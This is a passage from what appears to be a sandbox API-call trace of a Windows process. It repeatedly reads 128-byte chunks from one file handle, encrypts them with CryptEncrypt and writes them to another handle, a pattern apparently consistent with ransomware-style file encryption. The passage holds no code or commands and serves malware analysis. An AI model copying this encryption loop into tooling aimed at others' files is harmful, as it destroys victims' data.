lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.276] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.276] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.276] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.276] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.276] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.276] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.277] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.277] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.277] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.277] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.277] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.277] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.277] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.277] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.277] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.278] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.278] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.278] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.278] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.278] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.278] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.278] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.278] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.278] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.279] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.279] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.279] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.279] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.279] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.279] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.279] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.279] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.279] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.280] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.280] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.280] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.280] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.280] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: 